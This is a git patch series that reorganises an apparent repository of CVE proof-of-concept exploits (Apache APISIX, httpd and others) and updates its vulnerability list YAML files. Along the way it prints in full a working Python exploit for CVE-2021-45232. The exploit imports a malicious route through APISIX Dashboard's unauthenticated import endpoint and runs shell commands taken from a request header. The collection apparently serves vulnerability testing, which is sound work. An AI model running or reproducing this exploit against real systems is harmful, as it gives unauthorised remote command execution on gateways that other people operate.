From d18f0308989a2916600e44c1b67f4c2eb0e40830 Mon Sep 17 00:00:00 2001 From: lastre3et Date: Mon, 8 May 2023 14:17:56 +0800 Subject: [PATCH 1/2] Update Repo Status. --- .../2021/cve-2021-45232/RedMe.md | 0 .../cve-2021-45232/apisix_dashboard_rce.py | 184 +++++++++--------- .../2021/yaml/ cve-2021-45232.yaml | 42 ++-- .../2022/cve-2022-24112/README.md | 0 .../2022/cve-2022-24112/apisix-exploit.py | 0 .../2022/yaml/CVE-2022-24112.yaml | 0 .../2020/CVE-2020-9490/README.md | 0 .../2020/CVE-2020-9490/apache_poc.py | 0 .../2020/yaml/CVE-2020-9490.yaml | 0 .../2021/CVE-2021-41773/README.md | 0 .../2021/CVE-2021-41773/exploit.py | 0 .../Pasted image 20220313024756.png | Bin .../Pasted image 20220313024903.png | Bin .../2021/CVE-2021-42013/PoC.sh | 0 .../2021/CVE-2021-42013/README.md | 0 .../2021/CVE-2021-42013/apache.png | Bin .../2021/yaml/CVE-2021-41773.yaml | 0 .../2021/yaml/CVE-2021-42013.yaml | 0 openkylin_list.yaml | 34 ++-- other_list.yaml | 20 +- ...\346\264\236\346\250\241\347\211\210.yaml" | 10 +- 21 files changed, 144 insertions(+), 146 deletions(-) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/RedMe.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/apisix_dashboard_rce.py (96%) rename cve/{Apache-APISIX => apache-Apsix}/2021/yaml/ cve-2021-45232.yaml (97%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/README.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/apisix-exploit.py (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/yaml/CVE-2022-24112.yaml (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/README.md (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/apache_poc.py (100%) rename cve/{apache => apache-Httpd}/2020/yaml/CVE-2020-9490.yaml (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/exploit.py (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/PoC.sh (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/apache.png (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-41773.yaml (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-42013.yaml (100%) diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md similarity index 100% rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py similarity index 96% rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py index edd12c9f..30ebcda5 100644 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py @@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + "/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + "/" + uri) + else: print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml similarity index 97% rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml index ad102017..3041c776 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-45232 -source: https://github.com/wuppp/cve-2021-45232-exp -info: - name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 - severity: CRITICAL - description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 - scope-of-influence: - In Apache APISIX Dashboard before 2.10.1 - reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - - https://seclists.org/oss-sec/2021/q4/180 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - cnvd-id: None - kve-id: None +id: CVE-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + In Apache APISIX Dashboard before 2.10.1 + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None tags: cve2021 \ No newline at end of file diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md rename to cve/apache-Apsix/2022/cve-2022-24112/README.md diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml similarity index 100% rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md similarity index 100% rename from cve/apache/2020/CVE-2020-9490/README.md rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py similarity index 100% rename from cve/apache/2020/CVE-2020-9490/apache_poc.py rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml similarity index 100% rename from cve/apache/2020/yaml/CVE-2020-9490.yaml rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-41773/README.md rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py similarity index 100% rename from cve/apache/2021/CVE-2021-41773/exploit.py rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh similarity index 100% rename from cve/apache/2021/CVE-2021-42013/PoC.sh rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-42013/README.md rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png similarity index 100% rename from cve/apache/2021/CVE-2021-42013/apache.png rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-42013.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ad6d59..a6752cda 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -1,13 +1,13 @@ #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。 cve: - apache: + apache-Httpd: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - apache-APISIX: + apache-Apisix: - CVE-2022-24112 - CVE-2021-45232 - apache-activemq: + apache-Activemq: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 @@ -22,32 +22,31 @@ cve: - CVE-2021-26295 apache-Airflow: - CVE-2020-11978 - apache-log4j: + apache-Log4j: - CVE-2021-44228 - apache-solr: + apache-Solr: - CVE-2021-27905 - CVE-2019-0193 - apache-tomcat: + apache-Tomcat: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 - CVE-2017-12617 + - CVE-2020-13935 apache-Spark: - CVE-2022-33891 apache-Flink: - CVE-2020-17518 - apache-tomcat: - - CVE-2020-13935 - apache-unomi: + apache-Unomi: - CVE-2020-13942 - apache-struts: + apache-Struts: - CVE-2019-0230 apache-Shiro: - CVE-2022-32532 - Influx-DB: - - CVE-2019-20933 apache-Commons: - CVE-2022-33980 + influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -170,17 +169,19 @@ cve: - CVE-2022-22965 - CVE-2022-22963 - CVE-2022-31692 + java-SE: + - CVE-2022-21449 webmin: - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 - CVE-2019-15107 - Zimbra: + zimbra: - CVE-2022-27925 - CVE-2022-37042 - Grafana: + grafana: - CVE-2021-43798 - Froxlor: + froxlor: - CVE-2021-42325 - CVE-2023-0315 - CVE-2023-0877 @@ -197,5 +198,4 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 - Java-SE: - - CVE-2022-21449 + diff --git a/other_list.yaml b/other_list.yaml index bf286e5e..ea925499 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,11 +19,11 @@ cve: - CVE-2017-16995 polkit: - CVE-2021-3560 - Outlook: + outlook: - CVE-2023-23397 redis: - CVE-2022-0543 - EsFileExplorer: + esFileExplorer: - CVE-2019-6447 docker: - CVE-2019-5736 @@ -47,27 +47,25 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 - MinIO: + minIO: - CVE-2023-28432 - CVE-2023-28434 - WebLogic: + webLogic: - CVE-2023-21839 - Node.js: + node.js: - CVE-2021-21315 zabbix: - CVE-2022-23131 weblogic: - CVE-2022-2555 - CVE-2021-2109 - Zyxel: + zyxel: - CVE-2022-30525 - Gitlab: + gitlab: - CVE-2022-1175 -cnvd: - WordPress: + wordPress: - CVE-2019-8942 - CVE-2023-23488 - Zimbra: + zimbra: - CVE-2022-41352 cnvd: - diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71..1de22702 100644 --- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -10,10 +10,10 @@ info: reference: - 漏洞相关链接 classification: - cvss-metrics: CVSS:3.1 + cvss-metrics: CVSS向量 cvss-score: 漏洞评分 - cve-id: - cwe-id: - cnvd-id: - kve-id: + cve-id: CVE漏洞编号 + cwe-id: CWE编号 + cnvd-id: CNVD编号 + kve-id: KVE编号 tags: 漏洞标签 \ No newline at end of file -- Gitee From 5634d490deb67a95e3bab8abbce74d0650a7b443 Mon Sep 17 00:00:00 2001 From: lastre3et Date: Mon, 8 May 2023 14:23:16 +0800 Subject: [PATCH 2/2] Update Repo Status. --- .../2021/yaml/{ cve-2021-45232.yaml => cve-2021-45232.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cve/apache-Apsix/2021/yaml/{ cve-2021-45232.yaml => cve-2021-45232.yaml} (91%) diff --git a/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml similarity index 91% rename from cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml index 3041c776..0a99c9b6 100644 --- a/cve/apache-Apsix/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml @@ -8,9 +8,9 @@ info: scope-of-influence: In Apache APISIX Dashboard before 2.10.1 reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - https://seclists.org/oss-sec/2021/q4/180 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H -- Gitee